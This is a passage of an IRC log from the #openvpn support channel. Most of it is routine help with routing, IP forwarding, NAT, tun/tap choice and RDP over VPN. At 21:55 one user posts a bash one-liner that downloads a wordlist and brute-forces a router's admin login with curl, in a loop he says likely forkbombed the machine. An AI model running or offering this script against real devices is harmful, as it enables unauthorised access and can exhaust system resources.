so that only a "routable" interfac 13:36 < troker> created? 13:38 < pekster> !provider 13:38 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 13:39 < pekster> This said, what you want is called Policy Routing. LARTC has a good guide if you want to learn more: http://lartc.org/howto/ (Linux-based, although the basic premise holds across OSes) 13:39 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 13:39 < rob0> well, that's possibly beside the point here. ^^ yes 13:39 < rob0> it is a question for your OS 13:39 < troker> pekster: Understood, sounds like a reasonable rule 13:39 < rob0> probably not for your provider's help desk :) 13:41 < pekster> troker: Yea. We can't really help (here) since it's not an "openvpn" problem. Your provider can't either, because you need help learning about networking and your OS/distro. Start with LARTC for Linux-based learning, and maybe follow-up in your distro's support forums or a general network forum/channel 13:41 < pekster> The internals of policy-routing are non-trivial if you're new to the theory, but I always encourage learning :) 13:42 < troker> pekster: I understand, I am mildy proficient with PF so I plan on dealing with the routing in there. My question was more related to OpenVPNs push rules. 13:42 < troker> If I may be allowed one general question: What is the best way to test traffic flow through an interface? Like say I start this script with --rotute-nopull and I get a tun0 interface. How can I test that traffic has the ability to move through that interface? 13:43 < pekster> Add a test route via that interface, and watch where it goes? That's less a routing question (if you add a route correctly it'll get used) but a firewall question if you want traffic to actually go where you intend 13:44 < pekster> From openvpn's standpoint, if you (or the server pushes) 'redirect-gateway' you can either ignore it with --noroute-nopull, or override it on your OS with, say, a separate routing table 13:45 < troker> Ok cool, I think I have somewhat of a place to start taking look at this issue - thanks for all your help 13:46 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:55 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Quit: troker] 13:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:16 -!- troker [~troker@129.63.253.84] has joined #openvpn 14:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:28 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 14:29 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 14:29 -!- mode/#openvpn [+o dazo_afk] by ChanServ 14:29 -!- dazo_afk is now known as dazo 14:43 -!- troker [~troker@129.63.253.84] has quit [Quit: troker] 14:49 -!- troker [~troker@129.63.253.84] has joined #openvpn 14:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 14:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:10 < bandroidx> pekster: i was just thinking, if i run sfq on the egress interface and not on the tunnel interfaces, wouldnt that mean that people running many connections like bittorrent or ftp w/ 10 transfers will be able to barrel through the queuing process? i was thinking that if run on the tun0 they wouldnt be able to as it would be looking at a single tunnel connection to each user, but on the egress it will see the actual traffic being tunne 15:10 < bandroidx> led which may be many connections. or am i thinking of this wrong? 15:11 < pekster> Sure. But no one queue gets to dwarf out the others 15:14 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 15:15 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 15:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:35 -!- daemoen [~daemoen@216.245.201.138] has joined #openvpn 15:35 < daemoen> hello all 15:38 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:40 < daemoen> having issues with routed mode openvpn server on ubuntu, osx 10.8 client. firewall/server.conf: http://fpaste.org/9xYO 15:40 -!- troker [~troker@129.63.253.84] has quit [Quit: troker] 15:42 < daemoen> I can successfully ping 172.28.14.1 from the client, and the clients 172.16.14.6 from the server. I cannot however reach any of the 10/8 network behind the server from the client. routing table shows 10 via 172.28.14.5 as expected. traceroute shows traffic reaching the 172.28.14.1 (server). no flow beyond that point 15:42 < pekster> !serverlan 15:42 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 15:42 < pekster> Since you're doing NAT (line 23 in that paste) you don't need the return-route for the VPN network, but forwarding needs to be enabled on the server 15:43 < daemoen> it is enabled 15:43 < pekster> Assuming the traffic is going out eth0, of course 15:43 < daemoen> ec2 instance, only has eth0 and tun0 so yeah. 15:43 < daemoen> and ipv4 forwarding and promiscuous are enabled 15:44 < pekster> You don't want/need promisc 15:44 < daemoen> i have tried the classic nat method, and the proper routing methods 15:44 < daemoen> ive tried with and without :) 15:44 < daemoen> just in case 15:44 < pekster> Can the server ping the IP you're trying to reach from the client? 15:45 * daemoen facepalms 15:45 < daemoen> im gonna die if icmp is disabled 15:45 * daemoen sighs and shakes his head 15:46 < daemoen> ok, ignore me, im an id10t today it seems 15:46 < pekster> Some traceroute tools let you trace to an IP on an arbitrary port/protocol, which is great for tracing to things that don't ping or have the "standard" UDP traceroute ports open 15:47 * daemoen nods 15:48 < daemoen> so sorry, hadnt even thought that icmp wasnt enabled on the machines, heh. its the most basic of tshooting...... its laughable when youre using ping to test... and then realize that ssh is working fine after the fact.. 15:52 < pekster> I once blamed an ISP for connectivity when it turned out a lightening strike damaged the physical TX part of a NIC, but not the RX. So, software says the DHCP request goes out, tcpdump sees that and all the other customer's replies, but the TX never goes down the wire ;) 15:53 < pekster> Try that on for "things you might miss when troubleshooting" 15:53 < daemoen> ouch 15:53 < daemoen> that would be a .... yeah 15:55 < pekster> When I knew what to look for, there was a stack trace in the kernel log, but that's not exactly the first place you look when dhcp requests don't come back :P 15:55 < daemoen> lol 15:56 -!- bjh4 [~bjh4@12.104.148.2] has joined #openvpn 16:00 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 16:10 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 16:21 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 16:24 < troker> My routing table (after I run my vpn config) looks like this - http://pastebin.com/raw.php?i=yKKueYjS -- tun0's gateway is "link#10", I am unfamiliar with this. Does this mean that when openVPN set up the connection it didn't create a defualt gateway for the interface? 16:37 -!- nahmaste [~namaste@c-69-181-131-136.hsd1.ca.comcast.net] has quit [Quit: bai] 16:39 -!- cdnl [~cdnl@li284-140.members.linode.com] has joined #openvpn 16:39 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has joined #openvpn 16:40 < cdnl> I accidentally deleted /etc/init.d/openvpn 16:41 < pekster> Your distro package should have that file 16:41 < pekster> Most distros make changes from the sample initscript 16:41 < cdnl> where would I find it (centos 6.3) 16:42 < pekster> Ideally the backups of your system that you keep. Failing that, the RPM. I don't know enough about how RHEL/CentOS does builds to know if the file is inside the tarball, or if they patch it during the build process 16:43 < pekster> Maybe reinstalling the openvpn package over itself will put it back 16:43 < pekster> And in the future, you should be a lot more careful as root 16:43 < eN_Joy> i just recently re-built my box, it was a gentoo but now ubuntu 12.10, when i do ifconfig, i don't see a tun interface, however i do see that tun driver is loaded and there's a entry in /dev/net/tun, what should i look for next? thanks 16:44 < pekster> eN_Joy: Look for world peace next? openvpn creates the tun devices automatically; if you know that you need persistent devices for some reason, create it by hand or read your distro docs on network setup 16:46 < eN_Joy> pekster: lol, when i try to test my config file (that was used before) i got TCP/UDP: Socket bind failed on local address [undef]: Address already in use, then I thought tun0 might be the problem 16:48 < pekster> Nope 16:49 < pekster> The error clearly says it couldn't bind to the address, so you've selected a bad IP/port to bind to (port or local directive probably) 16:49 < pekster> Or something else is already listening there 16:49 < eN_Joy> pekster: yeah, forgot to uncomment the first directive in my config file "local a,b,c,d"... 16:50 < eN_Joy> do i set that to 127.0.0.1 or 0.0.0.0? 16:50 < pekster> The IP you wish to lsten on, or leave it blank to listen on the wildcard address 16:54 -!- p3rror [~mezgani@2001:0:53aa:64c:c41:26b2:d606:a524] has quit [Ping timeout: 245 seconds] 16:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:57 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:01 -!- cdnl [~cdnl@li284-140.members.linode.com] has quit [Ping timeout: 256 seconds] 17:02 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 17:04 -!- dazo [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 17:04 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 17:05 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 17:05 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 245 seconds] 17:05 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 276 seconds] 17:05 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Remote host closed the connection] 17:06 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 276 seconds] 17:06 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 276 seconds] 17:06 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 17:08 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 17:08 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn 17:08 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 17:09 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 17:11 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 17:11 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 17:12 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 17:12 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 17:12 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 17:15 -!- Shway [~Shway@216.208.252.66] has left #openvpn [] 17:18 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has joined #openvpn 18:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:06 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 18:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 18:09 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 18:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:16 < Shway> Hello, I am working the Amazon EC2 OpenVPN v2.3 I used the Amazon AMI and am stuck. I need to create a "general user" account to get past the login page as my RADIUS username and password are not working. HOWEVER there is no where to provide the newly created user in the OpenVPN Admin UI a password. I could really use some help on this. 18:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 18:18 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 18:18 -!- Kireji [~nospam@biocontact.org] has joined #openvpn 18:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:20 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Read error: Connection reset by peer] 18:20 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 18:21 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 245 seconds] 18:21 < Kireji> I set up openvpn server on a remote 1U, and tunnelblick on a local osx box. I can get tunnelblick to conect, but connections are not goign through the VPN 18:21 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 18:21 < Kireji> according to 18:21 < Kireji> https://code.google.com/p/tunnelblick/wiki/cFAQ#How_do_I_know_the_VPN_is_working? 18:21 <@vpnHelper> Title: cFAQ - tunnelblick - Frequently Asked Questions - OpenVPN GUI for Mac OS X - Google Project Hosting (at code.google.com) 18:21 < Kireji> I have to add redirect-gateway def1 to the osx config, but when I do, no network connections happen at all 18:22 < pekster> !redirect 18:22 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:22 <@vpnHelper> http://ircpimps.org/redirect.png 18:22 -!- gardar [~gardar@gardar.net] has joined #openvpn 18:22 -!- Shway [~Shway@216.208.252.66] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- In tests, 0x09 out of 0x0A l33t h4x0rz prefer it :)] 18:23 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 18:25 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 248 seconds] 18:25 < Kireji> is "--redirect-gateway" the same as the line "redirect-gateway def1" in the file config.ovpn ? 18:25 < kisom> Kireji: Yes, with the def1 flag set. 18:26 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 260 seconds] 18:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 18:27 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 18:27 < Kireji> "is ip forwarding enabled" - is this in the client (tunnelblick) or on the openvpn server? 18:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 18:27 < Kireji> /etc/openvpn/server.conf doesnt' have any line about ip forwarding 18:28 < Kireji> !ipforward 18:28 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 18:29 < Kireji> so I set up tun on the server 18:30 < Kireji> followed instructions on https://help.ubuntu.com/12.04/serverguide/openvpn.html 18:30 <@vpnHelper> Title: OpenVPN (at help.ubuntu.com) 18:31 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 18:32 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 18:32 < Kireji> for what I want, I don't think I need a bridged VPN mode, but I'm not sure 18:32 < pekster> That guide completely fails to mention OS-level IP forwarding 18:33 < pekster> Use the info the bot gave you 18:33 < pekster> openvpn doesn't replace your OSes routing and firewall operations, just connects the clients & server together 18:34 < Kireji> !linipforward 18:34 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 18:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:35 < Kireji> grrr 18:37 < Kireji> it apears the use case I'm expecting - the ability to connect to the server and get outside network connectivity is not really what openvpn does then? 18:37 < Kireji> I'll need to much with "iptables -I FORWARD -i tun+ -j ACCEPT" and "/sbin/ip link set "$ETHDEV" promisc on" ...? that gets me beyond what I understand wrt to networking 18:38 < Kireji> and turning difrent network adapters into promiscuous mode doesn't seem right 18:39 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has quit [Remote host closed the connection] 18:40 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has joined #openvpn 18:42 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 248 seconds] 18:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:45 < Kireji> is there a place online I can read more about linipforward? I need to understand this better to get my setup working 18:46 < pekster> OpenVPN is quite able to work in a redirection-based setup (this is why the bot gives you a cute flowchart to get it working) 18:46 < pekster> Don't use promisc; it won't help you 18:46 < pekster> !tcpip 18:46 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 18:46 < pekster> Without an understanding of routing and firewalling, openvpn won't be a lot of use to you 18:48 < Kireji> I have some basic understanding, and want to get it working 18:48 < Kireji> http://openvpn.net/index.php/open-source/documentation/howto.html has a differet iptables command 18:48 <@vpnHelper> Title: HOWTO (at openvpn.net) 18:48 < Kireji> "iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE" 18:49 < Kireji> I've used iptables in the past, I just don't have a deep understanding of what it's really doing 18:50 < kisom> Kireji: It created a NAT for your VPN adapter and forwards it to the eth0 adapter. 18:50 < daemoen> Kireji: in this case, youre masquerading the ip address that request are coming from, its a dirty hack 18:50 < kisom> Please don't kill me for that dumbed down explanation :) 18:51 < daemoen> kisom: how dumbed down you get depends on the person youre talking to. ive seen it go much dumber than that =D 18:52 < Kireji> I'm off to dinner, and I really, really appreciate yout help. I'll have to work on this later. 18:52 < Kireji> no dirty hacks. and I'm willing to read and learn to get it working 18:53 < kisom> Kireji: Then you need routable IP-addresses, which I assume you don't have 18:53 < Kireji> I want to use my 1U in a colo to create a VPN, and be able to connect to it from my laptop, and tunnel all my connections through it 18:53 < Kireji> routable IP-addresses on the server? 18:53 < daemoen> Kireji: ok, bridged or routed topology ? 18:53 < Kireji> I don't know 18:53 < pekster> it's routed 18:53 < daemoen> ie: are you in a shared network environment, or is the network stack yours isolated 18:54 < Kireji> I don't fully understand the trad off there 18:54 < pekster> rfc1918 is the correct use-case here, unless you plan on buying a block of public IPv4 IPs for some silly reason 18:54 < Kireji> the server has it's own IP, on a switch 18:54 < kisom> Kireji: In short, use NAT. The whole world does. 18:54 < Kireji> there's only 1 IP on one (1U) server hosting the openvpn service 18:55 < daemoen> pekster: whats wrong with bridging the private network to tunnel through the private gateway ? 18:55 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 18:56 < pekster> huh? What on earth is the use-case? 18:56 < Kireji> NAT meaning the openVPN server acts like a NAT on a router - and translates requests when they come in from the client - sends them out and re-translates them back once they return before sending them back to the client? 18:56 < pekster> He's interested in passing L3 traffic. Linking Ethernet traffic is not only pointless, but stupid if you connect it to the home LAN too since ARPs traverse the VPN, plus any other broadcasts (windows boxes, etc, etc) 18:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 18:57 < pekster> Don't suggest bridging just "becuase" -- that's a terriable reason 18:57 < Kireji> kisom: you say use NAT, daemoen: above wrote it's a dirty hack 18:57 < pekster> !tunortap 18:57 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 18:57 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 18:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:57 < kisom> Kireji: Because it really is a dirty hack, but everyone is still using it. 18:57 < pekster> NAT is a "dirty hack" that (nearly) ever home network uses to get Internet. It's not going away until ipv6 is native everywhere 18:57 < kisom> Not only home users. 18:58 < Kireji> oooohh - you mean *NAT* is a hack. of course 18:58 < pekster> Well, yes. but them in particular 18:58 < daemoen> pekster: or until most people figure out how to use 6in4 18:58 < pekster> Yea, I just got a sixxs tunnel a couple weeks ago 18:58 < pekster> <3 18:58 < Kireji> I thought you meant using "NAT" for this application / making the VPN to work is a hack 18:58 * daemoen nods. 18:58 < daemoen> I spent the past weekend arguing with my juniper config to get my HE 6in4 tunnel working at home 18:59 < daemoen> unfortunately they *still* dont support dhcpv6 client prefix delegation which is needed for me to use my isps native ipv6 stack 18:59 < Kireji> I'm not going for purity of network protocol idealism here, I want a reliable, secure solution to tunnel all my traffic through 18:59 < pekster> Kireji: You want a routed, rfc1918 ipv4 connection to your server, with NAT, ipforwarding, and forwarded traffic through the firewall 18:59 < kisom> Kireji: what he said ^ 18:59 < pekster> Kireji: Everything you need is found starting at the !redirect reply of the bot. Read that, the flowchart, the linked references, and the manpage. Come back if you get stuck *after* all that, and a web search gives you not enough to help yourself 19:00 < Kireji> pekster: cool. I'm about 1/2 way there I think 19:00 < Kireji> ok 19:00 < Kireji> tonight. thank you all 19:00 < Kireji> \afk 19:00 < pekster> daemoen: Your router doesn't support your ISPs PD, that is? 19:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:01 < daemoen> pekster: no SLAAC, so I have to be able to grab my public /64 prefix via dhcp, and then RA it (so im both a client and a server) 19:01 < daemoen> drives me nuts that comcast is only using dhcpv6 atm 19:03 < pekster> Hmm, someone in #ipv6 posted an RA from their Comcast, so that's gotta be local to your area 19:03 < daemoen> hmmmm 19:04 < pekster> Can't you not do dhcpv6 without an RA anyway? IIRC you need the RA to get the router configured (dhcpv6 won't do that, just addressing.) 19:04 * daemoen goes to investigate #ipv6 19:04 < daemoen> pekster: correct, but i cant get my prefix without the dhcpv6 19:04 < daemoen> thats the issue im having 19:04 < daemoen> is getting the prefix/address assignments 19:05 < daemoen> and since they are not static, but rather dynamic (which i still find to be stupid), i have to client to grab it before RA, unless they did finally implement SLAAC 19:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 19:12 < daemoen> pekster: i am curious why masquerade as opposed to routing though (in case of Kireji or anyone else for that matter). don't have to have a bunch of ips, just have a different subnet, which is the default. most people just use masquerade... which i dont understand why (other than its easier than doing proper routing) 19:13 < pekster> You can't route rfc1918.. 19:14 < pekster> Again, you need public IPs to route on the public Internet. People "playing around with" OpenVPN are not gunna go ask their hosted ISP for a /24 to do so 19:20 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 19:21 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 19:21 -!- mode/#openvpn [+o dazo_afk] by ChanServ 19:21 -!- dazo_afk is now known as dazo 19:22 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Quit: troker] 19:44 -!- raidz is now known as raidz_away 19:44 -!- AsadH is now known as zz_AsadH 19:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:50 -!- mode/#openvpn [+o krzee] by ChanServ 19:52 -!- bjh4 [~bjh4@12.104.148.2] has quit [Quit: Leaving] 20:16 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:28 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 20:28 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 20:50 -!- Aketzu [akolehma@kelvin.aketzu.net] has quit [Ping timeout: 264 seconds] 20:51 -!- Aketzu [akolehma@kelvin.aketzu.net] has joined #openvpn 20:56 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has quit [Ping timeout: 245 seconds] 21:07 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 21:19 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 21:24 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 21:30 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 248 seconds] 21:44 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 21:45 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 21:55 < ngharo> haha friend is forgot his local router password 21:55 < ngharo> i got him to forkbomb himself pretty sure 21:55 < ngharo> HOST=192.168.0.1; while :; do for x in $(wget http://www.cotse.com/wordlists/english -O - 2>/dev/null | sort -R); do if [ -n "$(curl --user "admin:$x" --head -q $HOST 2>/dev/null | grep -e 'HTTP.\+ 200')" ]; then echo "$HOST > admin:$x"; fi done & done 21:55 <@vpnHelper> Title: Privacy Service (at www.cotse.com) 21:56 < ngharo> the most crude brute force evar!! 21:57 < pekster> You could have done something more useful like link your friend to http://keepass.inf 21:57 < pekster> http://keepass.info 21:57 <@vpnHelper> Title: KeePass Password Safe (at keepass.info) 21:58 < ngharo> i'll do that when he finds the password ;) 21:59 < pekster> Just reset the stupid password 21:59 -!- MeanderingCode_ [~Meanderin@71-213-175-106.albq.qwest.net] has joined #openvpn 21:59 < pekster> Better yet, run a real OS on there so one can ssh in via pubkeys without passwords (except perhaps one you type to decrypt the local key...) 21:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 256 seconds] 22:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 22:19 -!- setuid [~setuid@99-16-210-3.lightspeed.drbyct.sbcglobal.net] has joined #openvpn 22:21 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 246 seconds] 22:21 < setuid> I'm attempting to secure several internal (LAN-side) Windows RDP sessions, so I can attach/manage them directly via the live Internet. I've installed OpenVPN on the Windows side, but… that's it. There's nothing out there describing how to configure OpenVPN to route RDP over that connection. 22:21 < setuid> Has anyone done this before? 22:22 < pekster> I'm sure "someone" has done that before. You want to run OpenVPN on one of the LAN systems and expose the entire LAN to VPN clients? 22:23 < setuid> nope, I want to be able to pinhole from the Internet through my routers to each Windows machine, in a secure, tunneled fashion 22:24 < pekster> So you want a separate openvpn instance on each server? That sounds slightly less than ideal, but you can do that too I suppose 22:24 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:24 < pekster> If you have an always-on system, it's a lot cleaner to do that with just 1 server though 22:24 < setuid> That's one idea, or just one instance exposing my internal 10.0.1.x to the tunnel 22:25 < setuid> All of my servers, laptops, etc. are on all the time, about 15 machines here. 22:25 < pekster> Right, so you want exactly what I said initially 22:25 < setuid> I have a big block of static IPs, so I can tunnel through if I need to 22:25 < pekster> You need to get your VPN running to the point that you can connect to it and ping the VPN IP of the server. Start here: 22:26 < pekster> !howto 22:26 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 22:26 < pekster> Then when you have that working, you can expose the server-side LAN to clients with this info: 22:26 < pekster> !serverlan 22:26 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 22:39 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:40 < setuid> Do I have to set up my own CA? Or is there one that can sign my keys externally? 22:40 < pekster> You set up your own CA 22:41 < pekster> Besides the CA, you only need a keypair for each client plus the server 22:42 < pekster> You can even authenticate users based on passwords, although you need a backend infrastructure to do that with (a script that validates them, or through use of the PAM plugin for Linux) 22:43 < setuid> My use case is my MacBook Air in a coffee shop pinhole'ing back through my firewall to my Windows laptops inside my office. 22:43 < setuid> So mac client, using Remote Desktop over the VPN to communicate with Windows laptops inside my 10.0.1.x internal LAN 22:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:44 < pekster> You can do whatever IP can. RDP is no different than pings or streaming webcam from your cat tower 22:45 < pekster> And yes, OpenVPN can transport $arbitrary_protocol over the tunnel just fine 22:46 < pekster> You may want to re-number your LAN, since some coffee shops may use that same network range (if your home network collides with a remote one, it'll cause you issues) 22:46 < setuid> Renumbering is not an option 22:46 < setuid> My internal lag cannot be moved away from 10.0.1.x, in fact, AT&T took away the ability to use that on their routers, so I had to add a second router behind theirs, to continue to function. 22:47 < pekster> Then it's possible you may have conflicts, although it's likely to be somewhat rare (I think 10.0.0/24 is more popular) 22:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:54 < setuid> Seems like setting this up is a prohibitively complex task, especially on Windows 22:56 < EugeneKay> Get a less shitty ISP. 22:57 < pekster> I'm not sure the IP is the problem if his/her own router is behind the crappy ISP unit 22:57 < pekster> but w/e 22:58 < setuid> EugeneKay, WIsh I could, but unfortunately in this half of my state, AT&T is the only option 22:58 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has quit [Quit: leaving] 23:03 -!- setuid [~setuid@99-16-210-3.lightspeed.drbyct.sbcglobal.net] has quit [Quit: sleep calls] 23:37 -!- brute11k [~brute11k@89.249.235.89] has 